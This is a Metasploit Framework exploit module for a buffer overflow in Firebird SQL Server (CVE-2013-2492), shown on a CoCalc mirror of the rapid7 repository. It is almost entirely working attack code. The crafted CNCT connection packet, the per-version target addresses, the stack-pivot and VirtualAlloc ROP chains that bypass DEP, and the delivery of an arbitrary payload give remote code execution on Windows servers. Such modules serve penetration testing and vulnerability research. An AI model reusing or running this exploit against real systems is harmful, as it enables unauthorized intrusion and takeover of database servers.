Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/misc/fb_cnct_group.rb
19718 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8
  include Msf::Exploit::Remote::Tcp

9


10
  def initialize

11
    super(

12
      'Name' => 'Firebird Relational Database CNCT Group Number Buffer Overflow',

13
      'Description' => %q{

14
          This module exploits a vulnerability in Firebird SQL Server.  A specially

15
        crafted packet can be sent which will overwrite a pointer allowing the attacker to

16
        control where data is read from.  Shortly, following the controlled read, the

17
        pointer is called resulting in code execution.

18


19
        The vulnerability exists with a group number extracted from the CNCT information,

20
        which is sent by the client, and whose size is not properly checked.

21


22
        This module uses an existing call to memcpy, just prior to the vulnerable code,

23
        which allows a small amount of data to be written to the stack. A two-phases

24
        stack pivot allows to execute the ROP chain which ultimately is used to execute

25
        VirtualAlloc and bypass DEP.

26
      },

27
      'Author' => 'Spencer McIntyre',

28
      'Arch' => ARCH_X86,

29
      'Platform' => 'win',

30
      'References' => [

31
        [ 'CVE', '2013-2492' ],

32
        [ 'OSVDB', '91044' ]

33
      ],

34
      'DefaultOptions' => {

35
        'EXITFUNC' => 'seh'

36
      },

37
      'Payload' => {

38
        # Stackpivot => mov eax,fs:[0x18] # add eax,8 # mov esp,[eax]

39
        'Prepend' => "\x64\xa1\x18\x00\x00\x00\x83\xc0\x08\x8b\x20",

40
        'Space' => 400,

41
        'BadChars' => "\x00\x0a\x0d"

42
      },

43
      'Targets' => [

44
        # pivots are pointers to stack pivots of size 0x28

45
        [ 'Windows FB 2.5.2.26539', { 'pivot' => 0x005ae1fc, 'rop_nop' => 0x005b0384, 'rop_pop' => 0x4a831344 } ],

46
        [ 'Windows FB 2.5.1.26351', { 'pivot' => 0x4add2302, 'rop_nop' => 0x00424a50, 'rop_pop' => 0x00656472 } ],

47
        [ 'Windows FB 2.1.5.18496', { 'pivot' => 0x4ad5df4d, 'rop_nop' => 0x0042ba8c, 'rop_pop' => 0x005763d5 } ],

48
        [ 'Windows FB 2.1.4.18393', { 'pivot' => 0x4adf4ed5, 'rop_nop' => 0x00423b82, 'rop_pop' => 0x4a843429 } ],

49
        [ 'Debug', { 'pivot' => 0xdead1337, 'rop_nop' => 0xdead1337, 'rop_pop' => 0xdead1337 } ]

50
      ],

51
      'DefaultTarget' => 0,

52
      'Privileged' => true,

53
      'DisclosureDate' => 'Jan 31 2013',

54
      'Notes' => {

55
        'Stability' => [ CRASH_SERVICE_RESTARTS ],

56
      },

57
    )

58


59
    register_options([Opt::RPORT(3050)])

60
  end

61


62
  def check

63
    begin

64
      connect

65
    rescue

66
      vprint_error("Unable to get a connection")

67
      return Exploit::CheckCode::Unknown

68
    end

69


70
    filename = "C:\\#{rand_text_alpha(12)}.fdb"

71
    username = rand_text_alpha(7)

72


73
    check_data = ""

74
    check_data << "\x00\x00\x00\x01\x00\x00\x00\x13\x00\x00\x00\x02\x00\x00\x00\x24"

75
    check_data << "\x00\x00\x00\x13"

76
    check_data << filename

77
    check_data << "\x00\x00\x00\x00\x04\x00\x00\x00\x24"

78
    check_data << "\x01\x07" << username << "\x04\x15\x6c\x6f\x63\x61\x6c"

79
    check_data << "\x68\x6f\x73\x74\x2e\x6c\x6f\x63\x61\x6c\x64\x6f\x6d\x61\x69\x6e"

80
    check_data << "\x06\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x01\x00\x00\x00\x02"

81
    check_data << "\x00\x00\x00\x05\x00\x00\x00\x02\x00\x00\x00\x0a\x00\x00\x00\x01"

82
    check_data << "\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00\x04\xff\xff\x80\x0b"

83
    check_data << "\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00\x06"

84
    check_data << "\xff\xff\x80\x0c\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x05"

85
    check_data << "\x00\x00\x00\x08"

86


87
    sock.put(check_data)

88
    data = sock.recv(16)

89
    disconnect

90


91
    opcode = data.unpack("N*")[0]

92
    if opcode == 3 # Accept

93
      return Exploit::CheckCode::Detected

94
    end

95


96
    return Exploit::CheckCode::Safe

97
  end

98


99
  def stack_pivot_rop_chain

100
    case target.name

101
    when 'Windows FB 2.5.2.26539'

102
      rop_chain = [

103
        0x005e1ea4,		# MOV EAX,EDI # RETN [fbserver.exe]

104
        0x0059ffeb,		# POP EBP # RETN [fbserver.exe]

105
        0x0000153c,		# 0x0000153c-> ebp

106
        0x005d261f,		# ADD EBP,EAX # MOV EBX,59FFFFC9 # RETN [fbserver.exe]

107
        0x0059fe1f,		# MOV ESP,EBP # POP EBP # RETN [fbserver.exe]

108
      ].pack("V*")

109
    when 'Windows FB 2.5.1.26351'

110
      rop_chain = [

111
        0x005e1ab8,		# MOV EAX,EDI # RETN [fbserver.exe]

112
        0x0059650b,		# POP EBP # RETN [fbserver.exe]

113
        0x0000153c,		# 0x0000153c-> ebp

114
        0x005cf6ff,		# ADD EBP,EAX # MOV EBX,59FFFFC9 # RETN [fbserver.exe]

115
        0x0059a3db,		# MOV ESP,EBP # POP EBP # RETN [fbserver.exe]

116
      ].pack("V*")

117
    when 'Windows FB 2.1.5.18496'

118
      rop_chain = [

119
        0x0055b844,		# MOV EAX,EDI # RETN [fbserver.exe]

120
        0x4a86ee77,		# POP ECX # RETN [icuuc30.dll]

121
        0x000001c0,		# 0x000001c0-> ecx

122
        0x005aee63,		# ADD EAX,ECX # RETN [fbserver.exe]

123
        0x4a82d326,		# XCHG EAX,ESP # RETN [icuuc30.dll]

124
      ].pack("V*")

125
    when 'Windows FB 2.1.4.18393'

126
      rop_chain = [

127
        0x0042264c,		# MOV EAX,EDI # RETN [fbserver.exe]

128
        0x4a8026e1,		# POP ECX # RETN [icuuc30.dll]

129
        0x000001c0,		# 0x000001c0-> ecx

130
        0x004c5499,		# ADD EAX,ECX # RETN [fbserver.exe]

131
        0x4a847664,		# XCHG EAX,ESP # RETN [icuuc30.dll]

132
      ].pack("V*")

133
    when 'Debug'

134
      rop_chain = [ ].fill(0x41414141, 0..5).pack("V*")

135
    end

136
    return rop_chain

137
  end

138


139
  def final_rop_chain

140
    # all rop chains in here created with mona.py, thanks corelan!

141
    case target.name

142
    when 'Windows FB 2.5.2.26539'

143
      rop_chain = [

144
        0x4a831344,	# POP ECX # RETN [icuuc30.dll]

145
        0x0065f16c,	# ptr to &VirtualAlloc() [IAT fbserver.exe]

146
        0x005989f0,	# MOV EAX,DWORD PTR DS:[ECX] # RETN [fbserver.exe]

147
        0x004666a6,	# XCHG EAX,ESI # RETN [fbserver.exe]

148
        0x00431905,	# POP EBP # RETN [fbserver.exe]

149
        0x00401932,	# & push esp # ret  [fbserver.exe]

150
        0x4a844ac0,	# POP EBX # RETN [icuuc30.dll]

151
        0x00001000,	# 0x00001000-> ebx

152
        0x4a85bfee,	# POP EDX # RETN [icuuc30.dll]

153
        0x00001000,	# 0x00001000-> edx

154
        0x005dae9e,	# POP ECX # RETN [fbserver.exe]

155
        0x00000040,	# 0x00000040-> ecx

156
        0x0057a822,	# POP EDI # RETN [fbserver.exe]

157
        0x005b0384,	# RETN (ROP NOP) [fbserver.exe]

158
        0x0046f8c3,	# POP EAX # RETN [fbserver.exe]

159
        0x90909090,	# nop

160
        0x00586002,	# PUSHAD # RETN [fbserver.exe]

161
      ].pack("V*")

162
    when 'Windows FB 2.5.1.26351'

163
      rop_chain = [

164
        0x00656472,	# POP ECX # RETN [fbserver.exe]

165
        0x0065b16c,	# ptr to &VirtualAlloc() [IAT fbserver.exe]

166
        0x00410940,	# MOV EAX,DWORD PTR DS:[ECX] # RETN [fbserver.exe]

167
        0x0063be76,	# XCHG EAX,ESI # RETN [fbserver.exe]

168
        0x0041d1ae,	# POP EBP # RETN [fbserver.exe]

169
        0x0040917f,	# & call esp [fbserver.exe]

170
        0x4a8589c0,	# POP EBX # RETN [icuuc30.dll]

171
        0x00001000,	# 0x00001000-> ebx

172
        0x4a864cc3,	# POP EDX # RETN [icuuc30.dll]

173
        0x00001000,	# 0x00001000-> edx

174
        0x0064ef59,	# POP ECX # RETN [fbserver.exe]

175
        0x00000040,	# 0x00000040-> ecx

176
        0x005979fa,	# POP EDI # RETN [fbserver.exe]

177
        0x00424a50,	# RETN (ROP NOP) [fbserver.exe]

178
        0x4a86052d,	# POP EAX # RETN [icuuc30.dll]

179
        0x90909090,	# nop

180
        0x005835f2,	# PUSHAD # RETN [fbserver.exe]

181
      ].pack("V*")

182
    when 'Windows FB 2.1.5.18496'

183
      rop_chain = [

184
        0x005763d5,	# POP EAX # RETN [fbserver.exe]

185
        0x005ce120,	# ptr to &VirtualAlloc() [IAT fbserver.exe]

186
        0x004865a4,	# MOV EAX,DWORD PTR DS:[EAX] # RETN [fbserver.exe]

187
        0x004cf4f6,	# XCHG EAX,ESI # RETN [fbserver.exe]

188
        0x004e695a,	# POP EBP # RETN [fbserver.exe]

189
        0x004d9e6d,	# & jmp esp [fbserver.exe]

190
        0x4a828650,	# POP EBX # RETN [icuuc30.dll]

191
        0x00001000,	# 0x00001000-> ebx

192
        0x4a85bfee,	# POP EDX # RETN [icuuc30.dll]

193
        0x00001000,	# 0x00001000-> edx

194
        0x00590328,	# POP ECX # RETN [fbserver.exe]

195
        0x00000040,	# 0x00000040-> ecx

196
        0x4a8573a1,	# POP EDI # RETN [icuuc30.dll]

197
        0x0042ba8c,	# RETN (ROP NOP) [fbserver.exe]

198
        0x00577605,	# POP EAX # RETN [fbserver.exe]

199
        0x90909090,	# nop

200
        0x004530ce,	# PUSHAD # RETN [fbserver.exe]

201
      ].pack("V*")

202
    when 'Windows FB 2.1.4.18393'

203
      rop_chain = [

204
        0x4a843429,	# POP ECX # RETN [icuuc30.dll]

205
        0x005ca120,	# ptr to &VirtualAlloc() [IAT fbserver.exe]

206
        0x0055a870,	# MOV EAX,DWORD PTR DS:[ECX] # RETN [fbserver.exe]

207
        0x004cecf6,	# XCHG EAX,ESI # RETN [fbserver.exe]

208
        0x004279c0,	# POP EBP # RETN [fbserver.exe]

209
        0x0040747d,	# & call esp [fbserver.exe]

210
        0x004ebef1,	# POP EBX # RETN [fbserver.exe]

211
        0x00001000,	# 0x00001000-> ebx

212
        0x4a864c5e,	# POP EDX # RETN [icuuc30.dll]

213
        0x00001000,	# 0x00001000-> edx

214
        0x004eaa3b,	# POP ECX # RETN [fbserver.exe]

215
        0x00000040,	# 0x00000040-> ecx

216
        0x4a8330a2,	# POP EDI # RETN [icuuc30.dll]

217
        0x00423b82,	# RETN (ROP NOP) [fbserver.exe]

218
        0x0046b5b1,	# POP EAX # RETN [fbserver.exe]

219
        0x90909090,	# nop

220
        0x004c8cfc,	# PUSHAD # RETN [fbserver.exe]

221
      ].pack("V*")

222
    when 'Debug'

223
      rop_chain = [ ].fill(0x41414141, 0..17).pack("V*")

224
    end

225
    return rop_chain

226
  end

227


228
  def exploit

229
    connect

230


231
    rop_nop_sled = [ ].fill(target['rop_nop'], 0..16).pack("V*")

232


233
    # this data gets written to the stack via memcpy, no more than 32 bytes can be written

234
    overwrite_and_rop_chain = [ target['rop_pop'] ].pack("V") # POP to skip the 4 bytes of the original pivot

235
    overwrite_and_rop_chain << [ (target['pivot'] - 8) ].pack("V") # MOV EDX,DWORD PTR DS:[EAX+8]

236
    overwrite_and_rop_chain << stack_pivot_rop_chain

237


238
    filename = "C:\\#{rand_text_alpha(13)}.fdb"

239
    evil_data = "\x00\x00\x00\x01\x00\x00\x00\x13\x00\x00\x00\x02\x00\x00\x00\x24"

240
    evil_data << "\x00\x00\x00\x14"

241
    evil_data << filename

242
    evil_data << "\x00\x00\x00\x04\x00\x00\x00\x24"

243
    evil_data << "\x05\x20"

244
    evil_data << overwrite_and_rop_chain

245
    evil_data << "\x15\x6c\x6f\x63\x61\x6c"

246
    evil_data << "\x68\x6f\x73\x74\x2e\x6c\x6f\x63\x61\x6c\x64\x6f\x6d\x61\x69\x6e"

247
    evil_data << "\x06\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x01\x00\x00\x00\x02"

248
    evil_data << "\x00\x00\x00\x05\x00\x00\x00\x02\x00\x00\x00\x0a\x00\x00\x00\x01"

249
    evil_data << "\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00\x04\xff\xff\x80\x0b"

250
    evil_data << "\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00\x06"

251
    evil_data << "\x41\x41\x41\x41\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x05"

252
    evil_data << "\x00\x00\x00\x08\x00\x41\x41\x41"

253
    evil_data << rop_nop_sled

254
    evil_data << final_rop_chain

255
    evil_data << payload.encoded

256


257
    print_status("#{rhost}:#{rport} - Sending Connection Request For #{filename}")

258
    sock.put(evil_data)

259


260
    disconnect

261
  end

262
end

263


264